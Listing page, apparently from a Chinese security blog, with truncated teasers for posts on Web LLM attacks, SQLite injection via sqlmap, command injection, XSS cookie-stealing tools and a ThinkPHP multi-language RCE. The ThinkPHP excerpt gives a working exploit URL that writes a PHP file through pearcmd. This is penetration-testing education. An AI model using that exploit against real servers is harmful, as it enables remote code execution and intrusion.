Web LLM 攻击技术

概述在ChatGPT问世以来,我也尝试挖掘过ChatGPT的漏洞,不过仅仅发现过一些小问题:无法显示xml的bug和错误信息泄露,虽然也挖到过一些开源LLM的漏洞,比如前段时间发现的Jan的漏洞,但是不得不说传统漏洞越来越难挖掘,所以我们仍然有必要学习下Web LLM攻击相关的漏洞。通常Web LLM的组成结构主要由Web前端界面、LLM、API接口、后端服务层组成,后端服务层包括身份验证和授权组

- 阅读全文 -

SQLite注入——使用sqlmap嵌套注入

某次测试中Burp提示SOL statement in request parameter:点开一看,好家伙,sql语句明文传输,目测可能存在SQL注入漏洞:想着直接使用sqlmap一梭子直接搞定,结果啥都没检测出来,怎么可能?然后使用Xray和burp fuzz都无法注出数据库和数据表等信息,离了个大谱。但手工测试发现:收集sqlite注入语句,将Payload插入占位符中测试,借助Chat G

- 阅读全文 -

无处不在的RCE

还在为漏扫什么都扫不到,找不到高质量漏洞只能凑低危、风险提示交差而烦恼吗?本期给大家分享一些漏洞挖掘工作中命令注入漏洞的挖掘思路和技巧,学会之后再也不愁找不到漏洞,废话不多说,上菜。001 XSS -> RCE测试目标是一个SSL VPN设备,功能点是修改主机名称,主机名称会显示到首页。经验丰富的朋友很容易就能想到XSS测试,然后漏扫一梭子是吧?没错,存在存储型XSS:在漏扫没扫到漏洞的情况

- 阅读全文 -

关于XSS

EZXSS 一款XSS盲打漏洞测试工具http://caidaome.com/?post=205一些漏洞点及骚思路新用户注册存储型XSS盲打获取Cookiehttps://baijiahao.baidu.com/s?id=1700829679816535168&wfr=spider&for=pc文件上传存储型XSS盲打获取Cookiehttps://cloud.tencent.com/develo

- 阅读全文 -

【漏洞复现】ThinkPHP 多语言模块RCE

Exp# 写文件 http://172.17.0.2/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/hello.php # 包含文件 http://172.17.0.2/public/index.p

- 阅读全文 -